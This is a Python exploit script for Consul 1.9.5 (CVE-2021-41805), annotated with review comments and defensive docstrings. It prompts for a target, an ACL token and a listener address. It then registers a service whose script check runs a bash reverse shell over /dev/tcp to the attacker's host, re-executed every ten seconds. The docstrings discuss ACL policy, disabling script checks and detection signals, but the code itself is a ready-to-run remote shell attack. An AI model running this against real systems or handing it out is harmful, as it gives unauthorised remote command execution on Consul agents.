#!/usr/bin/env python3
"""
Exploit Title: Consul 1.9.5 - Remote Code Execution (RCE)
CVE-2021-41805
"""
import requests, sys
# Get the target and listener info from the user
def getInput():
    """Prompt interactively for the target agent, the callback listener and the ACL token.

    Returns a 5-tuple of raw strings ``(rhost, rport, lhost, lport, acl_token)``;
    nothing is validated or type-converted here, the strings are interpolated
    as-is by ``exploit()``.

    NOTE(review): the second prompt is labelled "listener port" but the value
    is used by ``exploit()`` as the *target agent's* HTTP API port, so the
    wording is misleading (the real listener port is the fourth prompt).
    """
    rhost = input("\n[\033[1;37m+\033[1;37m] Enter the target: ")
    rport = input("\n[\033[1;37m+\033[1;37m] Enter the listener port: ")
    lhost = input("\n[\033[1;37m+\033[1;37m] Enter the listener IP: ")
    lport = input("\n[\033[1;37m+\033[1;37m] Enter the listener port: ")
    acl_token = input("\n[\033[1;37m+\033[1;37m] Enter the ACL token: ")
    return rhost, rport, lhost, lport, acl_token
# Send the request to the target and get connection
def exploit():
    """Register a service with a script check on the target Consul agent.

    The whole technique is a single authenticated ``PUT`` to the agent's
    ``/v1/agent/service/register`` endpoint whose ``check`` carries ``Args``,
    i.e. a Consul *script check*: the agent itself runs the listed command on
    its host, here on the declared ``interval``.  Nothing is exploited in the
    HTTP layer; the agent is simply doing what script checks are designed to
    do for any caller holding a token that may register services.

    Defensive notes (grounded in the request below):
      * The only credential is the ``X-Consul-Token`` header, so the control is
        the ACL policy attached to that token.  Tokens that permit service
        registration on an agent should be treated as host-level privileges.
      * Agents only execute ``Args`` checks when script checks are enabled in
        the agent configuration (``enable_script_checks`` /
        ``enable_local_script_checks``); with them disabled the registration
        is rejected.  Keep them disabled unless a specific service needs them.
      * The registration is visible in the catalog: service ``ID``/``Name``
        ``"test"`` on ``Port`` 80 with a ``check`` whose ``Args`` start with
        ``/bin/bash``.  A check definition containing a shell interpreter or a
        ``/dev/tcp`` redirection is a high-signal detection in agent and audit
        logs, as is any service registration from an unexpected source.

    Side effects: prints a status line to stdout; calls ``exit(1)`` on error.
    """
    rhost,rport,lhost,lport,acl_token = getInput()
    # Agent-local HTTP API; rport is the agent's API port (8500 by default),
    # despite the prompt text in getInput().
    target = f"http://{rhost}:{rport}/v1/agent/service/register"
    headers = {"X-Consul-Token": acl_token}
    # Local name shadows the stdlib module name `json`; harmless here because
    # the module is never imported, but confusing.
    json = {
        "Address": "127.0.0.1",
        # `Args` makes this a script check: the agent executes the command.
        # "interval" re-runs it every 10s, so the command is executed
        # repeatedly for as long as the service stays registered; "Timeout"
        # (10 days) keeps each run alive.  Deregistering the service stops it.
        "check": {
            "Args": [
                "/bin/bash", "-c", f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
            ],
            "interval": "10s",
            "Timeout": "864000s",
        },
        "ID": "test",
        "Name": "test",
        "Port": 80
    }
    try:
        # NOTE(review): the response status is never inspected, so the success
        # message below is printed even when the agent refused the request
        # (e.g. 403 from ACLs or script checks disabled).
        requests.put(target, headers=headers, json=json)
        print("\n[\033[1;32m+\033[1;37m] Request sent successfully, check your listener......\n")
    # NOTE(review): bare `except:` also swallows SystemExit/KeyboardInterrupt;
    # `except requests.RequestException:` is the narrow form.
    except:
        print("\n[\033[1;31m-\033[1;37m] Something went wrong, check the connection info and try again.....\n")
        exit(1)
# Module-level entry point: runs on import as well as on execution because
# there is no `if __name__ == "__main__":` guard.  Only Ctrl-C is handled
# here; every other error path already terminates inside exploit().
try:
    exploit()
except KeyboardInterrupt:
    print("\n[\033[1;31m-\033[1;37m] Exiting.....\n")